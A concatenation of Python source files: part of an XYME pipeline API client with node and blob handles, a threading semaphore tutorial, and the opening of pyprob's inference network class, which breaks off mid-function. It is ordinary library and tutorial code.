METHOD_PUT, "/worker", {
"pipeline": self.get_id(),
"replicas": replicas,
"task": None,
}))["success"]
def reload(self, timestamp: Optional[float] = None) -> float:
return cast(PipelineReload, self._client._request_json(
METHOD_PUT, "/pipeline_reload", {
"pipeline": self.get_id(),
"timestamp": timestamp,
}))["when"]
def set_kafka_topic_partitions(
self,
num_partitions: int,
large_input_retention: bool = False) -> KafkaTopics:
return cast(KafkaTopics, self._client._request_json(
METHOD_POST, "/kafka_topics", {
"pipeline": self.get_id(),
"num_partitions": num_partitions,
"large_input_retention": large_input_retention,
}))
def post_kafka_objs(self, input_objs: List[Any]) -> List[str]:
bios = [
BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
for input_obj in input_objs
]
return self.post_kafka_msgs(bios)
def post_kafka_msgs(self, input_data: List[BytesIO]) -> List[str]:
names = [f"file{pos}" for pos in range(len(input_data))]
res = cast(KafkaMessage, self._client._request_json(
METHOD_FILE, "/kafka_msg", {
"pipeline": self._pipe_id,
}, files=dict(zip(names, input_data))))
msgs = res["messages"]
return [msgs[key] for key in names]
def read_kafka_output(
self,
offset: str = "current",
max_rows: int = 100) -> Optional[ByteResponse]:
offset_str = [offset]
def read_single() -> Tuple[ByteResponse, str]:
cur, read_ctype = self._client.request_bytes(
METHOD_GET, "/kafka_msg", {
"pipeline": self.get_id(),
"offset": offset_str[0],
})
offset_str[0] = "current"
return interpret_ctype(cur, read_ctype), read_ctype
if max_rows <= 1:
return read_single()[0]
res: List[ByteResponse] = []
ctype: Optional[str] = None
while True:
val, cur_ctype = read_single()
if val is None:
break
if ctype is None:
ctype = cur_ctype
elif ctype != cur_ctype:
raise ValueError(
f"inconsistent return types {ctype} != {cur_ctype}")
res.append(val)
if len(res) >= max_rows:
break
if not res or ctype is None:
return None
return merge_ctype(res, ctype)
def get_kafka_offsets(self, alive: bool) -> KafkaOffsets:
return cast(KafkaOffsets, self._client._request_json(
METHOD_GET, "/kafka_offsets", {
"pipeline": self._pipe_id,
"alive": int(alive),
}))
def get_kafka_throughput(
self,
segment_interval: float = 120.0,
segments: int = 5) -> KafkaThroughput:
assert segments > 0
assert segment_interval > 0.0
offsets = self.get_kafka_offsets(alive=False)
now = time.monotonic()
measurements: List[Tuple[int, int, int, float]] = [(
offsets["input"],
offsets["output"],
offsets["error"],
now,
)]
for _ in range(segments):
prev = now
while now - prev < segment_interval:
time.sleep(max(0.0, segment_interval - (now - prev)))
now = time.monotonic()
offsets = self.get_kafka_offsets(alive=False)
measurements.append((
offsets["input"],
offsets["output"],
offsets["error"],
now,
))
first = measurements[0]
last = measurements[-1]
total_input = last[0] - first[0]
total_output = last[1] - first[1]
errors = last[2] - first[2]
total = last[3] - first[3]
input_segments: List[float] = []
output_segments: List[float] = []
cur_input = first[0]
cur_output = first[1]
cur_time = first[3]
for (next_input, next_output, _, next_time) in measurements[1:]:
seg_time = next_time - cur_time
input_segments.append((next_input - cur_input) / seg_time)
output_segments.append((next_output - cur_output) / seg_time)
cur_input = next_input
cur_output = next_output
cur_time = next_time
inputs = pd.Series(input_segments)
outputs = pd.Series(output_segments)
return {
"pipeline": self._pipe_id,
"input": {
"throughput": total_input / total,
"max": inputs.max(),
"min": inputs.min(),
"stddev": inputs.std(),
"segments": segments,
"count": total_input,
"total": total,
},
"output": {
"throughput": total_output / total,
"max": outputs.max(),
"min": outputs.min(),
"stddev": outputs.std(),
"segments": segments,
"count": total_output,
"total": total,
},
"faster": "both" if total_input == total_output else (
"input" if total_input > total_output else "output"),
"errors": errors,
}
def get_kafka_group(self) -> KafkaGroup:
return cast(KafkaGroup, self._client._request_json(
METHOD_GET, "/kafka_group", {
"pipeline": self._pipe_id,
}))
def set_kafka_group(
self,
group_id: Optional[str] = None,
reset: Optional[str] = None,
warnings_io: Optional[IO[Any]] = sys.stderr,
**kwargs: Any) -> KafkaGroup:
if kwargs and warnings_io is not None:
warnings_io.write(
f"WARNING: the provided kwargs {kwargs} will "
"get ignored on the server side.")
warnings_io.flush()
return cast(KafkaGroup, self._client._request_json(
METHOD_PUT, "/kafka_group", {
"pipeline": self._pipe_id,
"group_id": group_id,
"reset": reset,
**kwargs,
}))
def __hash__(self) -> int:
return hash(self._pipe_id)
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.get_id() == other.get_id()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self._pipe_id
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self._pipe_id}]"
# *** PipelineHandle ***
class NodeHandle:
def __init__(
self,
client: XYMEClientV3,
pipeline: PipelineHandle,
node_id: str,
node_name: str,
kind: str) -> None:
self._client = client
self._pipeline = pipeline
self._node_id = node_id
self._node_name = node_name
self._type = kind
self._blobs: Dict[str, BlobHandle] = {}
self._inputs: Dict[str, Tuple[str, str]] = {}
self._state: Optional[int] = None
self._config_error: Optional[str] = None
@staticmethod
def from_node_info(
client: XYMEClientV3,
pipeline: PipelineHandle,
node_info: NodeInfo,
prev: Optional['NodeHandle']) -> 'NodeHandle':
if prev is None:
res = NodeHandle(
client,
pipeline,
node_info["id"],
node_info["name"],
node_info["type"])
else:
if prev.get_pipeline() != pipeline:
raise ValueError(f"{prev.get_pipeline()} != {pipeline}")
res = prev
res.update_info(node_info)
return res
def update_info(self, node_info: NodeInfo) -> None:
if self._node_id != node_info["id"]:
raise ValueError(f"{self._node_id} != {node_info['id']}")
self._node_name = node_info["name"]
self._type = node_info["type"]
self._blobs = {
key: BlobHandle(
self._client,
value,
is_full=False,
pipeline=self.get_pipeline())
for (key, value) in node_info["blobs"].items()
}
self._inputs = node_info["inputs"]
self._state = node_info["state"]
self._config_error = node_info["config_error"]
def get_pipeline(self) -> PipelineHandle:
return self._pipeline
def get_id(self) -> str:
return self._node_id
def get_name(self) -> str:
return self._node_name
def get_type(self) -> str:
return self._type
def get_node_def(self) -> NodeDefInfo:
return self._client.get_node_defs()[self.get_type()]
def get_inputs(self) -> Set[str]:
return set(self._inputs.keys())
def get_input(self, key: str) -> Tuple['NodeHandle', str]:
node_id, out_key = self._inputs[key]
return self.get_pipeline().get_node(node_id), out_key
def get_status(self) -> TaskStatus:
return cast(NodeStatus, self._client._request_json(
METHOD_GET, "/node_status", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))["status"]
def has_config_error(self) -> bool:
return self._config_error is not None
def get_config_error(self) -> Optional[str]:
return self._config_error
def get_blobs(self) -> List[str]:
return sorted(self._blobs.keys())
def get_blob_handles(self) -> Dict[str, 'BlobHandle']:
return self._blobs
def get_blob_handle(self, key: str) -> 'BlobHandle':
return self._blobs[key]
def set_blob_uri(self, key: str, blob_uri: str) -> str:
return cast(PutNodeBlob, self._client._request_json(
METHOD_PUT, "/node_blob", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"blob_key": key,
"blob_uri": blob_uri,
}))["new_uri"]
def get_in_cursor_states(self) -> Dict[str, int]:
return cast(InCursors, self._client._request_json(
METHOD_GET, "/node_in_cursors", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))["cursors"]
def get_highest_chunk(self) -> int:
return cast(NodeChunk, self._client._request_json(
METHOD_GET, "/node_chunk", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))["chunk"]
def get_short_status(self, allow_unicode: bool = True) -> str:
status_map: Dict[TaskStatus, str] = {
"blocked": "B",
"waiting": "W",
"running": "→" if allow_unicode else "R",
"complete": "✓" if allow_unicode else "C",
"eos": "X",
"paused": "P",
"error": "!",
"unknown": "?",
"virtual": "∴" if allow_unicode else "V",
"queue": "=",
}
return status_map[self.get_status()]
def get_logs(self) -> str:
with self._client._raw_request_str(
METHOD_GET, "/node_logs", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}) as fin:
return fin.read()
def get_timing(self) -> List[Timing]:
return cast(Timings, self._client._request_json(
METHOD_GET, "/node_perf", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))["times"]
def read_blob(
self,
key: str,
chunk: Optional[int],
force_refresh: bool) -> 'BlobHandle':
res = cast(ReadNode, self._client._request_json(
METHOD_LONGPOST, "/read_node", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"key": key,
"chunk": chunk,
"is_blocking": True,
"force_refresh": force_refresh,
}))
uri = res["result_uri"]
if uri is None:
raise ValueError(f"uri is None: {res}")
return BlobHandle(
self._client,
uri,
is_full=True,
pipeline=self.get_pipeline())
def read(
self,
key: str,
chunk: Optional[int],
force_refresh: bool = False) -> Optional[ByteResponse]:
return self.read_blob(key, chunk, force_refresh).get_content()
def read_all(
self,
key: str,
force_refresh: bool = False) -> Optional[ByteResponse]:
self.read(key, chunk=None, force_refresh=force_refresh)
res: List[ByteResponse] = []
ctype: Optional[str] = None
while True:
blob = self.read_blob(key, chunk=len(res), force_refresh=False)
cur = blob.get_content()
if cur is None:
break
cur_ctype = blob.get_ctype()
if ctype is None:
ctype = cur_ctype
elif ctype != cur_ctype:
raise ValueError(
f"inconsistent return types {ctype} != {cur_ctype}")
res.append(cur)
if not res or ctype is None:
return None
return merge_ctype(res, ctype)
def clear(self) -> NodeState:
return cast(NodeState, self._client._request_json(
METHOD_PUT, "/node_state", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"action": "reset",
}))
def requeue(self) -> NodeState:
return cast(NodeState, self._client._request_json(
METHOD_PUT, "/node_state", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"action": "requeue",
}))
def fix_error(self) -> NodeState:
return cast(NodeState, self._client._request_json(
METHOD_PUT, "/node_state", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"action": "fix_error",
}))
def get_csv_blob(self) -> 'CSVBlobHandle':
if self.get_type() != "csv_reader":
raise ValueError("node doesn't have csv blob")
res = cast(CSVBlobResponse, self._client._request_json(
METHOD_GET, "/csv_blob", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))
return CSVBlobHandle(
self._client,
self.get_pipeline(),
res["csv"],
res["count"],
res["pos"],
res["tmp"])
def get_json_blob(self) -> 'JSONBlobHandle':
if self.get_type() != "jsons_reader":
raise ValueError(
f"can not append jsons to {self}, expected 'jsons_reader'")
res = cast(JSONBlobResponse, self._client._request_json(
METHOD_GET, "/json_blob", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))
return JSONBlobHandle(
self._client,
self.get_pipeline(),
res["json"],
res["count"])
def check_custom_code_node(self) -> None:
if not self.get_type() in CUSTOM_NODE_TYPES:
raise ValueError(f"{self} is not a custom code node.")
def set_custom_imports(
self, modules: List[List[str]]) -> CustomImportsResponse:
self.check_custom_code_node()
return cast(CustomImportsResponse, self._client._request_json(
METHOD_PUT, "/custom_imports", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"modules": modules,
}))
def get_custom_imports(self) -> CustomImportsResponse:
self.check_custom_code_node()
return cast(CustomImportsResponse, self._client._request_json(
METHOD_GET, "/custom_imports", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))
def set_es_query(self, query: Dict[str, Any]) -> ESQueryResponse:
if self.get_type() != "es_reader":
raise ValueError(f"{self} is not a es reader node")
return cast(ESQueryResponse, self._client._request_json(
METHOD_POST, "/es_query", {
"pipeline": self.get_pipeline().get_id(),
"blob": self.get_blob_handle("es").get_uri(),
"es_query": query,
},
))
def get_es_query(self) -> ESQueryResponse:
if self.get_type() != "es_reader":
raise ValueError(f"{self} is not a es reader node")
return cast(ESQueryResponse, self._client._request_json(
METHOD_GET, "/es_query", {
"pipeline": self.get_pipeline().get_id(),
"blob": self.get_blob_handle("es").get_uri(),
},
))
def set_custom_code(self, func: FUNC) -> CustomCodeResponse:
from RestrictedPython import compile_restricted
self.check_custom_code_node()
def fn_as_str(fun: FUNC) -> str:
body = textwrap.dedent(inspect.getsource(fun))
res = body + textwrap.dedent(f"""
result = {fun.__name__}(*data)
if result is None:
raise ValueError("{fun.__name__} must return a value")
""")
compile_restricted(res, "inline", "exec")
return res
raw_code = fn_as_str(func)
return cast(CustomCodeResponse, self._client._request_json(
METHOD_PUT, "/custom_code", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"code": raw_code,
}))
def get_custom_code(self) -> CustomCodeResponse:
self.check_custom_code_node()
return cast(CustomCodeResponse, self._client._request_json(
METHOD_GET, "/custom_code", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))
def get_user_columns(self, key: str) -> UserColumnsResponse:
return cast(UserColumnsResponse, self._client._request_json(
METHOD_GET, "/user_columns", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"key": key,
}))
def get_input_example(self) -> Dict[str, Optional[ByteResponse]]:
if self.get_type() != "custom_data":
raise ValueError(
"can only load example input data for 'custom' node")
res = {}
for key in self.get_inputs():
input_node, out_key = self.get_input(key)
df = input_node.read(out_key, 0)
if df is not None and isinstance(df, pd.DataFrame):
user_columns = \
input_node.get_user_columns(out_key)["user_columns"]
rmap = {col: col.replace("user_", "") for col in user_columns}
df = df.loc[:, user_columns].rename(columns=rmap)
res[key] = df
return res
def setup_model(self, obj: Dict[str, Any]) -> Any:
if self.get_type() not in MODEL_NODE_TYPES:
raise ValueError(f"{self} is not a model node")
model_type: str
if self.get_type() in EMBEDDING_MODEL_NODE_TYPES:
model_type = "embedding"
return cast(ModelSetupResponse, self._client._request_json(
METHOD_PUT, "/model_setup", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
"config": obj,
"model_type": model_type,
}))
def get_model_params(self) -> Any:
return cast(ModelParamsResponse, self._client._request_json(
METHOD_GET, "/model_params", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))
def get_def(self) -> NodeDef:
return cast(NodeDef, self._client._request_json(
METHOD_GET, "/node_def", {
"pipeline": self.get_pipeline().get_id(),
"node": self.get_id(),
}))
def __hash__(self) -> int:
return hash(self._node_id)
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.get_id() == other.get_id()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self._node_id
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self._node_id}]"
# *** NodeHandle ***
EMPTY_BLOB_PREFIX = "null://"
class BlobHandle:
def __init__(
self,
client: XYMEClientV3,
uri: str,
is_full: bool,
pipeline: PipelineHandle) -> None:
self._client = client
self._uri = uri
self._is_full = is_full
self._pipeline = pipeline
self._ctype: Optional[str] = None
def is_full(self) -> bool:
return self._is_full
def is_empty(self) -> bool:
return self._uri.startswith(EMPTY_BLOB_PREFIX)
def get_uri(self) -> str:
return self._uri
def get_pipeline(self) -> PipelineHandle:
return self._pipeline
def get_ctype(self) -> Optional[str]:
return self._ctype
def get_content(self) -> Optional[ByteResponse]:
if not self.is_full():
raise ValueError(f"URI must be full: {self}")
if self.is_empty():
return None
fin, ctype = self._client._raw_request_bytes(METHOD_POST, "/uri", {
"uri": self._uri,
"pipeline": self.get_pipeline().get_id(),
})
self._ctype = ctype
return interpret_ctype(fin, ctype)
def list_files(self) -> List['BlobHandle']:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
resp = self._client._request_json(
METHOD_GET, "/blob_files", {
"blob": self._uri,
"pipeline": self.get_pipeline().get_id(),
})
return [
BlobHandle(
self._client,
blob_uri,
is_full=True,
pipeline=self._pipeline)
for blob_uri in resp["files"]
]
def as_str(self) -> str:
return f"{self.get_uri()}"
def set_owner(self, new_owner: str) -> str:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
pipe = self.get_pipeline()
res = cast(BlobOwner, self._client._request_json(
METHOD_PUT, "/blob_owner", {
"pipeline": pipe.get_id(),
"blob": self._uri,
"owner": new_owner,
}))
return res["owner"]
def get_owner(self) -> str:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
pipe = self.get_pipeline()
res = cast(BlobOwner, self._client._request_json(
METHOD_GET, "/blob_owner", {
"pipeline": pipe.get_id(),
"blob": self._uri,
}))
return res["owner"]
def copy_to(
self,
to_uri: str,
new_owner: Optional[str] = None) -> 'BlobHandle':
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
pipe = self.get_pipeline()
res = cast(CopyBlob, self._client._request_json(
METHOD_POST, "/copy_blob", {
"pipeline": pipe.get_id(),
"from_uri": self._uri,
"owner": new_owner,
"to_uri": to_uri,
}))
return BlobHandle(
self._client, res["new_uri"], is_full=False, pipeline=pipe)
def download_zip(self, to_path: Optional[str]) -> Optional[io.BytesIO]:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
cur_res, _ = self._client._raw_request_bytes(
METHOD_GET, "/download_zip", {
"blob": self._uri,
"pipeline": self.get_pipeline().get_id(),
})
if to_path is None:
return io.BytesIO(cur_res.read())
with open(to_path, "wb") as file_download:
file_download.write(cur_res.read())
return None
def upload_zip(
self, source: Union[str, io.BytesIO]) -> List['BlobHandle']:
if isinstance(source, str) or not hasattr(source, "read"):
with open(f"{source}", "rb") as fin:
zip_stream = io.BytesIO(fin.read())
else:
zip_stream = source
resp = self._client._request_json(
METHOD_FILE, "/upload_zip", {
"blob": self._uri,
"pipeline": self.get_pipeline().get_id(),
}, files={
"file": zip_stream,
})
return [
BlobHandle(
self._client,
blob_uri,
is_full=True,
pipeline=self._pipeline)
for blob_uri in resp["files"]
]
def convert_model(self, reload: bool = True) -> ModelReleaseResponse:
return cast(ModelReleaseResponse, self._client._request_json(
METHOD_POST, "/convert_model", {
"blob": self._uri,
"pipeline": self.get_pipeline().get_id(),
"reload": reload,
}))
def __hash__(self) -> int:
return hash(self.as_str())
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.as_str() == other.as_str()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self.as_str()
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.as_str()}]"
# *** BlobHandle ***
class CSVBlobHandle(BlobHandle):
def __init__(
self,
client: XYMEClientV3,
pipe: PipelineHandle,
uri: str,
count: int,
pos: int,
has_tmp: bool) -> None:
super().__init__(client, uri, is_full=False, pipeline=pipe)
self._client = client
self._pipe = pipe
self._uri = uri
self._count = count
self._pos = pos
self._has_tmp = has_tmp
def get_uri(self) -> str:
return self._uri
def get_count(self) -> int:
return self._count
def get_pos(self) -> int:
return self._pos
def has_tmp(self) -> bool:
return self._has_tmp
def perform_action(
self,
action: str,
additional: Dict[str, Union[str, int]],
fobj: Optional[IO[bytes]]) -> int:
args: Dict[str, Union[str, int]] = {
"blob": self.get_uri(),
"action": action,
"pipeline": self.get_pipeline().get_id(),
}
args.update(additional)
if fobj is not None:
method = METHOD_FILE
files: Optional[Dict[str, IO[bytes]]] = {
"file": fobj,
}
else:
method = METHOD_POST
files = None
res = cast(CSVOp, self._client._request_json(
method, "/csv_action", args, files=files))
self._count = res["count"]
self._has_tmp = res["tmp"]
self._pos = res["pos"]
return self._pos
def start_data(self, size: int, hash_str: str, ext: str) -> int:
return self.perform_action("start", {
"ext": ext,
"hash": hash_str,
"size": size,
}, None)
def append_data(self, fobj: IO[bytes]) -> int:
return self.perform_action("append", {}, fobj)
def finish_data(self) -> None:
self.perform_action("finish", {}, None)
def clear_tmp(self) -> None:
self.perform_action("clear", {}, None)
def upload_data(
self,
file_content: IO[bytes],
file_ext: str,
progress_bar: Optional[IO[Any]] = sys.stdout) -> int:
init_pos = file_content.seek(0, io.SEEK_CUR)
file_hash = get_file_hash(file_content)
total_size = file_content.seek(0, io.SEEK_END) - init_pos
file_content.seek(init_pos, io.SEEK_SET)
if progress_bar is not None:
progress_bar.write("Uploading file:\n")
print_progress = get_progress_bar(out=progress_bar)
cur_size = self.start_data(total_size, file_hash, file_ext)
while True:
print_progress(cur_size / total_size, False)
buff = file_content.read(get_file_upload_chunk_size())
if not buff:
break
new_size = self.append_data(BytesIO(buff))
if new_size - cur_size != len(buff):
raise ValueError(
f"incomplete chunk upload n:{new_size} "
f"o:{cur_size} b:{len(buff)}")
cur_size = new_size
print_progress(cur_size / total_size, True)
self.finish_data()
return cur_size
def add_from_file(
self,
filename: str,
progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
fname = filename
if filename.endswith(INPUT_ZIP_EXT):
fname = filename[:-len(INPUT_ZIP_EXT)]
ext_pos = fname.rfind(".")
if ext_pos >= 0:
ext = filename[ext_pos + 1:] # full filename
else:
raise ValueError("could not determine extension")
with open(filename, "rb") as fbuff:
self.upload_data(fbuff, ext, progress_bar)
def add_from_df(
self,
df: pd.DataFrame,
progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
io_in = None
try:
io_in = df_to_csv(df)
self.upload_data(io_in, "csv", progress_bar)
finally:
if io_in is not None:
io_in.close()
# *** CSVBlobHandle ***
class JSONBlobHandle(BlobHandle):
def __init__(
self,
client: XYMEClientV3,
pipe: PipelineHandle,
uri: str,
count: int) -> None:
super().__init__(client, uri, is_full=False, pipeline=pipe)
self._client = client
self._pipe = pipe
self._uri = uri
self._count = count
def get_uri(self) -> str:
return self._uri
def get_count(self) -> int:
return self._count
def append_jsons(self, jsons: List[Any]) -> 'JSONBlobHandle':
res = self._client._request_json(
METHOD_PUT, "/json_append", {
"pipeline": self.get_pipeline().get_id(),
"blob": self.get_uri(),
"jsons": jsons,
})
self._count = res["count"]
return self
# *** JSONBlobHandle ***
class ComputationHandle:
def __init__(
self,
pipeline: PipelineHandle,
data_id: str,
get_dyn_error: Callable[[], Optional[str]],
set_dyn_error: Callable[[str], None]) -> None:
self._pipeline = pipeline
self._data_id = data_id
self._value: Optional[ByteResponse] = None
self._get_dyn_error = get_dyn_error
self._set_dyn_error = set_dyn_error
def has_fetched(self) -> bool:
return self._value is not None
def get(self) -> ByteResponse:
try:
if self._value is None:
self._value = self._pipeline.get_dynamic_result(self._data_id)
return self._value
except ServerSideError as e:
if self._get_dyn_error() is None:
self._set_dyn_error(str(e))
raise e
except KeyError as e:
maybe_error = self._get_dyn_error()
if maybe_error is not None:
raise ServerSideError(maybe_error) from e
raise e
def get_id(self) -> str:
return self._data_id
def __str__(self) -> str:
value = self._value
if value is None:
return f"data_id={self._data_id}"
return f"value({type(value)})={value}"
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.__str__()}]"
def __hash__(self) -> int:
return hash(self.get_id())
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.get_id() == other.get_id()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
# *** ComputationHandle ***
def create_xyme_client_v3(
url: str, token: Optional[str] = None) -> XYMEClientV3:
return XYMEClientV3(url, token)
|
semaphores_tut.py | import random, time
from threading import BoundedSemaphore, Thread
max_items = 5
"""
Consider 'container' as a container, of course, with a capacity of 5
items. Defaults to 1 item if 'max_items' is passed.
"""
container = BoundedSemaphore(max_items)
def producer(nloops):
for i in range(nloops):
time.sleep(random.randrange(2, 5))
print(time.ctime(), end=': ')
try:
container.release()
print('Produced an item')
except ValueError:
print('Full, skipping')
def consumer(nloops):
for i in range(nloops):
time.sleep(random.randrange(2, 5))
print(time.ctime(), end=': ')
"""
In the following if statement we disable the default
blocking behaviour by passing False for the blocking flag
"""
if container.acquire(False):
print('Consumed an item.')
else:
print('Empty, skipping.')
threads = []
nloops = random.randrange(3, 6)
print('Starting with %s items.' % max_items)
threads.append(Thread(target=producer, args=(nloops,)))
threads.append(Thread(target=consumer, args=(random.randrange(nloops, nloops + max_items + 2),)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print('Add done.') |
inference_network.py | import torch
import torch.nn as nn
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.distributed as dist
from torch.utils.data import DataLoader
import sys
import time
import os
import shutil
import uuid
import tempfile
import tarfile
import copy
import math
import warnings
from threading import Thread
from termcolor import colored
from . import Batch, OfflineDataset, TraceBatchSampler, DistributedTraceBatchSampler, EmbeddingFeedForward, EmbeddingCNN2D5C, EmbeddingCNN3D5C
from .optimizer_larc import LARC
from .. import __version__, util, Optimizer, LearningRateScheduler, ObserveEmbedding
class InferenceNetwork(nn.Module):
# observe_embeddings example: {'obs1': {'embedding':ObserveEmbedding.FEEDFORWARD, 'reshape': [10, 10], 'dim': 32, 'depth': 2}}
def __init__(self, model, observe_embeddings={}, network_type=''):
super().__init__()
self._model = model
self._layers_observe_embedding = nn.ModuleDict()
self._layers_observe_embedding_final = None
self._layers_pre_generated = False
self._layers_initialized = False
self._observe_embeddings = observe_embeddings
self._observe_embedding_dim = None
self._infer_observe = None
self._infer_observe_embedding = {}
self._optimizer = None
self._optimizer_type = None
self._optimizer_state = None
self._momentum = None
self._weight_decay = None
self._learning_rate_scheduler = None
self._learning_rate_scheduler_type = None
self._learning_rate_scheduler_state = None
self._total_train_seconds = 0
self._total_train_traces = 0
self._total_train_traces_end = None
self._total_train_iterations = 0
self._learning_rate_init = None
self._learning_rate_end = None
self._loss_init = None
self._loss_min = float('inf')
self._loss_max = None
self._loss_previous = float('inf')
self._history_train_loss = []
self._history_train_loss_trace = []
self._history_valid_loss = []
self._history_valid_loss_trace = []
self._history_num_params = []
self._history_num_params_trace = []
self._distributed_train_loss = util.to_tensor(0.)
self._distributed_valid_loss = util.to_tensor(0.)
self._distributed_history_train_loss = []
self._distributed_history_train_loss_trace = []
self._distributed_history_valid_loss = []
self._distributed_history_valid_loss_trace = []
self._modified = util.get_time_str()
self._updates = 0
self._on_cuda = False
self._device = torch.device('cpu')
self._learning_rate = None
self._momentum = None
self._batch_size = None
self._distributed_backend = None
self._distributed_world_size = None
self._network_type = network_type
def _init_layers_observe_embedding(self, observe_embeddings, example_trace):
if len(observe_embeddings) == 0:
raise ValueError('At least one observe embedding is needed to initialize inference network.')
if isinstance(observe_embeddings, set):
observe_embeddings = {o: {} for o in observe_embeddings}
observe_embedding_total_dim = 0
for name, value in observe_embeddings.items():
variable = example_trace.named_variables[name]
# distribution = variable.distribution
# if distribution is None:
# raise ValueError('Observable {}: cannot use this observation as an input to the inference network, because there is no associated likelihood.'.format(name))
# else:
if 'reshape' in value:
input_shape = torch.Size(value['reshape'])
print('Observable {}: reshape to {}.'.format(name, input_shape))
else:
input_shape = variable.value.size()
print('Observable {}: reshape not specified, using shape {}.'.format(name, input_shape))
if 'dim' in value:
output_shape = torch.Size([value['dim']])
print('Observable {}: using embedding dim {}.'.format(name, output_shape))
else:
print('Observable {}: embedding dim not specified, using the default 256.'.format(name))
output_shape = torch.Size([256])
if 'embedding' in value:
embedding = value['embedding']
print('Observable {}: using observe embedding {}.'.format(name, embedding))
else:
print('Observable {}: observe embedding not specified, using the default FEEDFORWARD.'.format(name))
embedding = ObserveEmbedding.FEEDFORWARD
if embedding == ObserveEmbedding.FEEDFORWARD:
if 'depth' in value:
depth = value['depth']
print('Observable {}: using embedding depth {}.'.format(name, depth))
else:
print('Observable {}: embedding depth not specified, using the default 2.'.format(name))
depth = 2
layer = EmbeddingFeedForward(input_shape=input_shape, output_shape=output_shape, num_layers=depth)
elif embedding == ObserveEmbedding.CNN2D5C:
layer = EmbeddingCNN2D5C(input_shape=input_shape, output_shape=output_shape)
elif embedding == ObserveEmbedding.CNN3D5C:
layer = EmbeddingCNN3D5C(input_shape=input_shape, output_shape=output_shape)
else:
raise ValueError('Unknown embedding: {}'.format(embedding))
layer.to(device=util._device)
self._layers_observe_embedding[name] = layer
observe_embedding_total_dim += util.prod(output_shape)
self._observe_embedding_dim = observe_embedding_total_dim
print('Observe embedding dimension: {}'.format(self._observe_embedding_dim))
self._layers_observe_embedding_final = EmbeddingFeedForward(input_shape=self._observe_embedding_dim, output_shape=self._observe_embedding_dim, num_layers=2)
self._layers_observe_embedding_final.to(device=util._device)
def _embed_observe(self, traces=None):
embedding = []
for name, layer in self._layers_observe_embedding.items():
values = torch.stack([util.to_tensor(trace.named_variables[name].value) for trace in traces]).view(len(traces), -1)
embedding.append(layer(values))
embedding = torch.cat(embedding, dim=1)
embedding = self._layers_observe_embedding_final(embedding)
return embedding
def _infer_init(self, observe=None):
self._infer_observe = observe
embedding = []
for name, layer in self._layers_observe_embedding.items():
value = util.to_tensor(observe[name]).view(1, -1)
embedding.append(layer(value))
embedding = torch.cat(embedding, dim=1)
self._infer_observe_embedding = self._layers_observe_embedding_final(embedding)
def _init_layers(self):
raise NotImplementedError()
def _polymorph(self, batch):
raise NotImplementedError()
def _infer_step(self, variable, previous_variable=None, proposal_min_train_iterations=None):
raise NotImplementedError()
def _loss(self, batch):
raise NotImplementedError()
def _save(self, file_name):
self._modified = util.get_time_str()
self._updates += 1
data = {}
data['pyprob_version'] = __version__
data['torch_version'] = torch.__version__
# The following is due to a temporary hack related with https://github.com/pytorch/pytorch/issues/9981 and can be deprecated by using dill as pickler with torch > 0.4.1
data['inference_network'] = copy.copy(self)
data['inference_network']._model = None
data['inference_network']._optimizer = None
if self._optimizer is None:
data['inference_network']._optimizer_state = None
else:
data['inference_network']._optimizer_state = self._optimizer.state_dict()
data['inference_network']._learning_rate_scheduler = None
if self._learning_rate_scheduler is None:
data['inference_network']._learning_rate_scheduler_state = None
else:
data['inference_network']._learning_rate_scheduler_state = self._learning_rate_scheduler.state_dict()
def thread_save():
tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))
tmp_file_name = os.path.join(tmp_dir, 'pyprob_inference_network')
torch.save(data, tmp_file_name)
tar = tarfile.open(file_name, 'w:gz', compresslevel=2)
tar.add(tmp_file_name, arcname='pyprob_inference_network')
tar.close()
shutil.rmtree(tmp_dir)
t = Thread(target=thread_save)
t.start()
t.join()
@staticmethod
def _load(file_name):
try:
tar = tarfile.open(file_name, 'r:gz')
